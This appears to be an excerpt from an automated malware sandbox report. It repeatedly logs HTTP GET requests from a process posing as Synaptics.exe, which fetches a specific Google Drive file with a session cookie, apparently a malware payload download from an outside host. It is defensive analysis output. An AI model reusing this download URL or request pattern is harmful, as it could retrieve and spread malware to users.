                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
